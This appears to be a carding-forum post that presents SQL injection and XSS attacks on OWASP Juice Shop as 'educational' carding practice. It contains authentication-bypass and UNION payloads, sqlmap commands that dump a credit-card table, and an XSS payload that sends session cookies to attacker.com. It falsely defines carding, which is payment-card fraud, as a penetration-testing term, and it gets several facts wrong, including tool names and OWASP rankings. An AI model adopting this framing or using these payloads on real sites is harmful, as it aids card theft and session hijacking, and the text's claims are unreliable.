Penetration Testing Practices on Test Sites: Detecting SQLi and XSS in the Context of Carding for Educational Purposes

[Student]

Introduction to context​

For educational purposes, let's explore scanning test sites (such as OWASP Juice Shop) for vulnerabilities like SQL injection (SQLi) and cross-site scripting (XSS), with a focus on carding — a cybersecurity term for testing systems for resistance to theft and use of stolen credentials (cards, logins). Carding is often used in penetration testing to simulate attacks where an attacker attempts to push fake data through vulnerable forms (such as payment or registration forms).

Important warning: This information is intended solely for educational purposes and ethical hacking (white-hat penetration testing). For practice, use only legitimate platforms like OWASP Juice Shop, DVWA, or HackTheBox.

In the context of carding, SQLi and XSS vulnerabilities are especially dangerous because they allow data validation to be bypassed, credentials to be spoofed, and even sessions to be hijacked. Below I'll go into detail about the theory, tools, and steps with examples so you can replicate it on your local machine.

Theory: How SQLi and XSS are related to carding​

• SQL injection (SQLi): An attacker inserts malicious SQL code into input fields (such as login or payment forms) to manipulate the database. In carding, this allows:
  • Bypass authentication (login without password).
  • Extract card data from the database (e.g. CVV or full numbers).
  • Example: Entering ' OR '1'='1 into the email field causes the SQL query to always return "true", skipping validation.
• Cross-site scripting (XSS): Injecting JavaScript code into a web page, which executes in the victim's browser. In carding, this is used to:
  • Stealing session cookies (to "intercept" a session after a successful login with fake data).
  • Redirects to phishing forms to collect real cards.
  • Types: Reflected (reflected in URL), Stored (stored in DB), DOM-based.

OWASP Juice Shop (a vulnerable training application) has forms simulating e-commerce (shopping cart, checkout), where such vulnerabilities are built in for practice. Install it locally: git clone https://github.com/juice-shop/juice-shop && cd juice-shop && npm install && npm start. The site will launch at http://localhost:3000.

Recommended scanning tools​

For educational pentesting in the context of carding, choose tools that automate fake data injection tests (e.g., proxy card lists). Here's an expanded list with a focus on integration:

Tool	Description in the context of carding	SQLi/XSS support	Installation and Basic Command (Linux/Mac)	Why is it useful for learning?
OWASP ZAP	A GUI proxy for intercepting and automated scanning of forms (logins, payments). Supports fuzzing with card payloads.	Yes (active scanner + fuzzing)	sudo apt install zaproxy Run: zaproxy	Visual interface: It's easy to see how a fake card is being pushed through XSS.
sqlmap	Automates SQLi with payloads for DB dump (simulates card theft).	SQLi (full spectrum: blind, time-based)	pip install sqlmap Пример: sqlmap -u "http://target.com/login" --data="card=4111111111111111&cvv=123"	Shows how to extract "stolen" data step by step.
XSStrike	CLI for detecting XSS with evasion techniques (WAF bypass).	XSS (cookie stealing payloads)	git clone https://github.com/s0md3v/XSStrike && pip install -r requirements.txt Пример: python xsstrike.py -u "http://target.com/search?q=<script>"	Generates payloads that simulate phishing for card data.
Burp Suite Community	Proxy with Intruder for brute-force fake cards + extensions (SQLi/XSS plugins).	Yes (with modules)	Download from portswigger.net Run: java -jar burpsuite_community.jar	Ideal for manual carding: test lists of card numbers.
Nobody	Quick scan for common vulnerabilities (including SQLi in headers).	Partial (SQLi probes)	sudo apt install nikto Example: nikto -h http://localhost:3000	Complements by identifying entry points for card attacks.

Additionally: To simulate carding, use test card data (e.g. from Stripe: 4242424242424242) and tools like cc-checker to validate numbers.

Detailed steps for scanning in the context of carding​

Let's assume Juice Shop is running on localhost:3000. Configure a proxy (ZAP on 127.0.0.1:8080) in your browser to intercept traffic.

Step 1: Preparation and Reconnaissance​

• Goal: Find forms vulnerable to card data input (e.g. /#/basket or /rest/user/login).
• Actions:
  1. Open the website in your browser through the ZAP proxy.
  2. View traffic in ZAP (History tab): Look for POST requests with fields like email, password, cardNumber.
  3. Use Nikto for a quick overview: nikto -h http://localhost:3000 -Tuning x (focus on XSS/SQLi).
• Educational insight: In real carding, reconnaissance is key: 80% of success is in finding weak endpoints.

Step 2: Scan for SQLi (focus on bypassing authentication for "card login")​

• Scenario: We test the login form by simulating the entry of fake card credentials (as if a carder were stealing accounts for purchases).
• Automated test with sqlmap:
  

  sqlmap -u "http://localhost:3000/rest/user/login" --method POST --data="email=admin@juice-sh.op&password=admin123" --batch --dbs --level 3 --risk 2

  • --data: Simulates fake data (replace with a test card: card=5555555555554444).
  • --dbs: If vulnerable, will show databases (for example, "Users" with card hashes).
  • Expected output: If SQLi works, sqlmap will dump the tables: sqlmap -D Users -T CreditCards --dump.
• Manual test in ZAP:
  1. Intercept the POST request in Proxy.
  2. In "Active Scan" add SQLi rule and run.
  3. Payload: In the email field, enter 'UNION SELECT credit_card FROM cards--.
• Analysis: If the request returns data (true positive), it means the system isn't sanitizing the input — a carder could extract real cards. This is the #1 vulnerability in the Juice Shop challenge.

Step 3: Scan for XSS (focus on session theft after a "card purchase")​

• Scenario: After entering a fake card into the cart, we implement XSS to steal cookies (sessions with access to the profile).
• Automated test with XSStrike:
  

  python xsstrike.py -u "http://localhost:3000/#/search?query=<script>alert(document.cookie)</script>" --fuzzer

  • This tests the search string for reflected XSS.
  • If it works, the script will run, displaying the cookies (including the session with the "stolen" data).
• Extended payload for carding(in Burp Intruder):
  1. Intercept GET/POST with comment or search field.
  2. В Intruder: Payloads — <script>fetch('http://attacker.com/steal?cookie='+document.cookie)</script>.
  3. Run: This simulates sending cookies to the carder server.
• Manual test in browser:
  • In the search field: <img src=x onerror=alert(document.cookie)>.
  • If the alert is triggered, XSS is confirmed — the carder could have substituted the payment form.
• Analysis: Juice Shop has XSS in the comments (challenge #12). This allows for stored XSS, where malicious script is stored and affects other users.

Step 4: Carding Integration – Simulating a Full Attack​

• Scenario: Combine: SQLi to dump maps → XSS to steal sessions.
  1. Use sqlmap to extract test maps from the database.
  2. Enter them into the payment form via Burp, adding XSS-payload in the "billing name" field.
  3. Monitor in ZAP: If a session is stolen, you'll see a redirect or cookie leak.
• Automation tool: Write a simple Python script with requests:
  

  import requests
  url = 'http://localhost:3000/rest/user/login'
  data = {'email': "' OR 1=1--", 'password': 'fake'}
  response = requests.post(url, data=data)
  if 'Welcome' in response.text: print("SQLi success - card bypass!")

  • This is a basic proof-of-concept for learning.

Step 5: Analysis and Reporting​

• Logs: ZAP generates an HTML report with risks (High for SQLi/XSS).
• False positives: Always verify manually (execute payload and check source code).
• Metrics: In carding, measure the success rate (how many fake cards were processed).

Educational Advice and Advocacy​

• Why is this important to learn? Understanding carding helps develop WAFs (Web Application Firewalls), prepared statements in SQL, and CSPs (Content Security Policy) for XSS.
• Further:
  • Study OWASP Top 10 (SQLi #7, XSS #3).
  • Try DVWA (Damn Vulnerable Web App) for difficulty levels.
  • Courses: TryHackMe or PentesterLab (carding modules).
• Carding protection: Use CAPTCHA, rate limiting, card tokenization (do not store full numbers).

If you need scripts, screenshots, or step-by-step clarification, please ask! Remember: knowledge is for good, not harm.